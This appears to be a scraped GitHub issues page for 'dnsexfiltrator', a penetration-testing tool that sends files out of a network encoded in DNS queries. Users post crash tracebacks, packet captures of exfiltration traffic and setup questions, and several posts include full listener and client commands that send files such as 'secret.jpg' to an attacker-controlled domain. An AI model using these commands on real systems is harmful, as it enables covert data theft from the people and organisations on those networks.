arno0x / dnsexfiltrator Goto Github PK

I keep getting:

"Traceback (most recent call last):
File "./dnsexfiltrator.py", line 144, in
request = DNSRecord.parse(data)
File "/usr/lib/python2.7/dist-packages/dnslib/dns.py", line 104, in parse
questions.append(DNSQuestion.parse(buffer))
File "/usr/lib/python2.7/dist-packages/dnslib/dns.py", line 645, in parse
buffer.offset,e))
dnslib.dns.DNSError: Error unpacking DNSQuestion [offset=55]: Invalid label < lets>"

Any idea how to fix?

Hello, thank you for your fantastic work!
I found sometimes the server dies, and believed that it is because of recieving bogus DNS data such as:

[1] DNS requests which generated from others
[2] Duplicated DNS record

For example, I saw the following:

# ./dnsexfiltrator.py -d ****** -p ******
[*] DNS server listening on port 53
[+] Received query: [init.RE5TRXhmaWwudHh0fDU.******.net.] - Type: [16]
[+] Receiving file [DNSExfil.txt] as a ZIP file in [5] chunks
[+] Received query: [ns2.******.net.] - Type: [28]
[!] Stopping DNS Server
Traceback (most recent call last):
  File "./dnsexfiltrator.py", line 156, in <module>
    chunkNumber, rawData = msg.split('.',1)
ValueError: need more than 1 value to unpack

# ./dnsexfiltrator.py -d ****** -p ******
[*] DNS server listening on port 53
[+] Received query: [69.nyXdZj07A7zOWKcGeITueGkSvETv4CReY6tVOJLELarJlE4Lcs.******.net.] - Type: [16]
[!] Stopping DNS Server
Traceback (most recent call last):
  File "./dnsexfiltrator.py", line 173, in <module>
    if chunkIndex == nbChunks:
NameError: name 'nbChunks' is not defined

The tcpdump is here:

09:08:00.560297 IP 54.***.***.196.49148 > 172.***.***.88.53: 464% [1au] AAAA? ns1.******.net. (54)
09:08:00.560314 IP 54.***.***.196.18018 > 172.***.***.88.53: 33279% [1au] AAAA? ns2.******.net. (54)
09:08:00.563451 IP 52.***.***.101.22503 > 172.***.***.88.53: 39347% [1au] AAAA? ns1.******.net. (54)
09:08:00.563464 IP 52.***.***.101.16777 > 172.***.***.88.53: 23126% [1au] AAAA? ns2.******.net. (54)
09:08:00.563546 IP 52.***.***.101.13240 > 172.***.***.88.53: 27581% [1au] TXT? 0.S6GMbKdnhmKG72XDoUUIHNeWeHCAjxYZzICr9YNGDK55zXd-Q6gUwsoTpFBN8Bo.KtcPvGtNqHw3D8CA93Gubwldn2xYZ_IIRqib-qDBcL2uDB43ZBEvLfrQLb2Ll0e.2gsfvaPbZD6XrKVmgI8lfcHC-eAR1mFNSN62LiaF7KRjAE-L3Q6FmeoCu3a56Ji.FIZKR-KMGj1Zttm7NlepW5zURsfU3.******.net. (274)
09:08:00.571530 IP 54.***.***.207.19137 > 172.***.***.88.53: 43369% [1au] AAAA? ns2.******.net. (54)
09:08:00.577745 IP 13.***.***.85.59518 > 172.***.***.88.53: 54284% [1au] TXT? 0.S6GMbKdnhmKG72XDoUUIHNeWeHCAjxYZzICr9YNGDK55zXd-Q6gUwsoTpFBN8Bo.KtcPvGtNqHw3D8CA93Gubwldn2xYZ_IIRqib-qDBcL2uDB43ZBEvLfrQLb2Ll0e.2gsfvaPbZD6XrKVmgI8lfcHC-eAR1mFNSN62LiaF7KRjAE-L3Q6FmeoCu3a56Ji.FIZKR-KMGj1Zttm7NlepW5zURsfU3.******.net. (274)
09:08:00.717056 IP 13.***.***.172.49485 > 172.***.***.88.53: 28854% AAAA? ns2.******.net. (43)
09:08:00.717087 IP 13.***.***.172.64431 > 172.***.***.88.53: 12666% AAAA? ns1.******.net. (43)
^C

In the case, the DNS records start with "ns1" and "ns2" seem to trigger the error.
So I added the following:

136       if qname.startswith("ns"):
137         continue
138

But it should not enough ...

The choice between RC4 and AES is not just a matter of taste. RC4 has serious vulnerabilities and is deprecated by RFC 7465, published three years ago. https://www.rfc-editor.org/rfc/rfc7465.txt

Hi, I am really appreciate that you create such tools so that I could test DNS security.
I have downloaded this file and have kind of issue.

I also have seen of same issue in this github page.

However, I really don't know how to solve this.

Here is my environment:

1. My attacking environment kali is on AWS EC2.
2. I use route 53 to manage my domain abc.shop(abc.shop is sample)
3. so my NS records should be "ns-xxx.awsdns-xxx.com" something like this
4. I connect my domain abc.shop to my kali 53.x.x.x
5. I used "python2 dnsexfiltrator.py -d abc.shop -p password" on my kali(53.x.x.x) It can be on listening status.
6. My victim machine is window and it is on my exsi server (172.X.X.X)
7. I have used such command on window powershell. "Invoke-DNSExfiltrator -i secret.jpg -d abc.shop -p password" and it says DNS name doesn't exist.

My question is this:
Did I configure something wrong?
Do I have to own a Name server of NS record? (because I don't own the name server but AWS own it)
Thank you for your effort,
Best regards.

It would be great to have an option to use/support different versions of .NET, even at the cost of not compressing files

Hello,
First of all, many thanks for your efforts and help.

I'm keeping getting this message "DNS name doesn't exist" however my DNS and Google DNS can resolve mydomain.com with no issues and NS record is pointing to my kali machine.
Is there anything missing, please? by the way I'm using win10 as the source and the kali with python 2.7 as a target.

hello,
the data transferred unable to unzip or corrupted? using Invoke-DNSExfiltrator.ps1

unzip test.txt.zip
Archive: test.txt.zip
End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.
unzip: cannot find zipfile directory in one of test.txt.zip or
test.txt.zip.zip, and cannot find test.txt.zip.ZIP, period.

file test.txt.zip
test.txt.zip: data

the file is not a zip file. how can i see the data exfiltrated? or transferred? thanks

i am using the power shell ,
i have an EC2 virtual machine on amazone which is running Kali Linux and i am doing the same steps having the same domain specified in the server and the client

Server : .\dnsexfiltrator.py -d mydomain.com -p password
Client : ./DNSExfiltrator.exe c:\users\root\Desktop\DNSExfiltrator-master\test1.png mydomain.com password s=ip of my ec2 machine t=1000

i also tried to put the domain name of the ec2 machine but it didnt recognize it.

your help will be highly apprecaited as i have an exfiltration at a customer site and i need to use this tool

Best Regards